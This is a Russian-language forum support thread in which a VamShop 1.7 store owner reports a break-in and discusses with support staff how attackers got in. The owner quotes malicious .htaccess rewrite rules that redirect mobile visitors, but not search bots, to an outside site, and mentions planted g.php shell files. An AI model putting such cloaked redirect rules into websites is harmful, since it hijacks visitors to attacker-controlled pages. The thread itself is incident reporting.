Взломали 1.7

[korvin1000 0]

Взломали в .htaccess внесли изменения, в том числе и oscommerce (они в одной домашней папке с oscommerce).


RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blac
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]^M
RewriteRule (.*) http://m.extrasoftwa...e=217.112.35.90 [L,R=302] # On

В логах посмотрел в фтп был только я.
Зашли через ВАМ шоп версия 1.7, папке Images куча файлов g.php
Прошу заделать дыру, сбросил логи веб-сервера на почту, примерно с 3.07 по 7 .07

У меня в домашней папке и oscommerce находится, я сначало на него грешил. И Именно в том форуме написал

[support 447]

1.7 сразу ставилась или до 1.7 версии обновлялись патчами?

[YuraS 4]

В логах посмотрел в фтп был только я.

Зашли через ВАМ шоп

 

то, что на ФТП были только Вы, совсем не значит, что зашли через вамшоп.

для того, чтобы залить шелл, совсем необязательно заходить на фтп.

возможно, сервер дыряв, как дуршлаг. хостинг копеечный?

[korvin1000 0]

обновлялся патчами. Хостеры говорят. что у них какой-то суперсовременный.

На почте письмо, там логи веб-сервера

"По форуму Логи вэбсервера"

Правда ссылка в письме не та, я сначала подумал что, зашли через оскоммерс

[support 447]

У Вас есть папка /admin/includes/javaacript/tiny_mce/plugins/tinybrowser/ !?

[korvin1000 0]

такой папки нет.

в логах можно посмотреть по файлам

g.php и zip.php.

Их по три, 2 - (.asf) и 1- (.ppt). Если вам что то даст.

Самое ужасное, что может еще где-то нагадили, но найти не могу, антивирус ничего не показывает

 

Такое примерно где-то было

http://vamshop.ru/forum/topic/9113-%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D1%8B%D0%B5-%D1%83%D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B8-%D0%B2-vamshop-156/

 

, может еще какие-то старые папки и файлы есть, которые надо бы удалить. Мы когда то говорили на эту тему, что надо бы сделать обновление, которое удалило бы все не нужное.

а может все таки зашли через oscommerce, но я там ничего не нашел, может по неопытности?

[support 447]

В старых версиях были найдены дырки, но насколько я знаю они закрыты все и если Вы точно устанавливали обновелния и не пропускали никакие файлы, т.е. переписали всё из патча, по идее, должно быть нормально.

 

Это был единственный случай такой или продолжают гадить в магазине?

[korvin1000 0]

Обновлялся за архивировал обновление и распаковал в папке сервера (слияние).

В .htaccess нет - поставил доступ 440. В папке Images, то же нормально. Просто не знаю где еще искать.

 В оскоммерс то же все пока хорошо. Сайты в подписи, может вы увидите что-то подозрительное?

[support 447]

Давайте пока подождём тогда, посмотрим.

[korvin1000 0]

Высланные логи вам что-нибудь подсказали?

[support 447]

Ну а что там смотреть, Вы ж не написали, когда имено сломали, просто скинули мне кучу файлов за всё время.

Я в этой куче копаться и не буду, нужно хотя бы нормально писать, когда именно сломали, хотя бы примерные даты.

[korvin1000 0]

как не написал, в первом сообщении написано с 3 по 7 июля

[support 447]

Если ещё раз взломают, пришлите логи только за этот день, посмотрю.